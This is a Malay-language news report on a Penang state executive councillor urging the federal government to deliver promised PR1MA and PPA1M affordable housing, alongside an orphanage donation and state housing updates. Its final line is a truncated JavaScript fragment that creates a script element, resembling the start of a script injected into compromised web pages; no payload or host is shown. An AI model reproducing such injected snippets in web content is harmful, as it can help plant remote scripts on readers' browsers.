Exco sedia bertemu Menteri, harap Pusat tunai janji dulu sedia rumah untuk P. Pinang

DATUK KERAMAT – Kerajaan Pusat diseru agar seiringan bersama Kerajaan Negeri dalam usaha penyediaan rumah mampu milik di negeri ini.

Exco Perancangan Bandar & Desa dan Perumahan, Jagdeep Singh Deo berkata, adalah menjadi harapan agar Kerajaan Pusat dapat bekerjasama menangani ‘kebimbangan’ Kerajaan Negeri dengan merealisasikan pembinaan rumah mampu milik di bawah skim Perumahan Rakyat 1Malaysia (PR1MA) dan Perumahan Penjawat Awam 1Malaysia (PPA1M) di Pulau Pinang.

“Sepanjang tahun 2015, telah banyak pengumuman dibuat Kerajaan Pusat termasuk oleh Menteri Kesejahteraan Bandar, Perumahan dan Kerajaan Tempatan (KPKT), Datuk Abdul Rahman Dahlan untuk membina rumah di bawah skim PR1MA di Pulau Pinang.

“Namun, sehingga ke hari ini, masih belum nampak apa-apa perancangan untuk membina unit-unit rumah mampu milik di bawah skim PR1MA di sini,” katanya pada sidang media di sini baru-baru ini.

Beliau berkata demikian selepas menyempurnakan Majlis Penyampaian Sumbangan Baucar Kelengkapan Persekolahan Kepada 51 Anak-anak Yatim dari Wisma Anak-anak Yatim Pulau Pinang di sini baru-baru ini.

Hadir sama, Yang di-Pertua Wisma Anak-anak Yatim Pulau Pinang, Tan Sri Datuk Seri Yusof Latif.

Pada majlis berkaitan, Jagdeep yang juga Ahli Dewan Undangan Negeri (ADUN) Datuk Keramat turut mengumumkan sumbangan RM20,000 kepada Wisma Anak-anak Yatim Pulau Pinang bagi membantu pengurusan, pentadbiran dan penyelenggaraan kediaman anak-anak yatim tersebut.

Mengulas lanjut, Jagdeep memberitahu bahawa sebagai langkah permulaan tahun 2016, beliau bersedia untuk mengadakan pertemuan bersama Abdul Rahman bagi membincangkan beberapa isu perumahan termasuk skim-skim perumahan yang pernah diumumkan Kerajaan Pusat sebelum ini.

“Saya bersedia bertemu beliau (Abdul Rahman) dan berharap tahun ini (2016), Kerajaan Pusat dapat menunaikan janji-janji yang dibuat dahulu untuk Pulau Pinang sekaligus menyediakan rumah yang selesa dan mampu dimiliki,” ujarnya.

Mengulas lanjut, Jagdeep memberitahu bahawa 12 projek perumahan yang direncanakan oleh Kerajaan Negeri di lima daerah seluruh Pulau Pinang kini di ‘landasan’ yang betul.

“Ini termasuk penyempurnaan sasaran fasa pertama 520 unit rumah mampu milik di Bandar Cassia, Batu Kawan, tahun ini, dan penyerahan kunci kepada penyerahan kunci kepada 370 pemilik rumah di Majestic Heights Fasa 2A yang telah menunggu lebih 17 tahun untuk menduduki kediaman masing-masing.

“Selain itu, kita (Kerajaan Negeri) juga akan merancakkan lagi kerjakerja ‘meremajakan’ semula bangunanbangunan kediaman kos rendah yang ‘berusia’ di negeri ini demi keselesaan dan kesejahteraan rakyat Pulau Pinang,” ujarnya.

var d=document;var s=d.createElement(‘script’);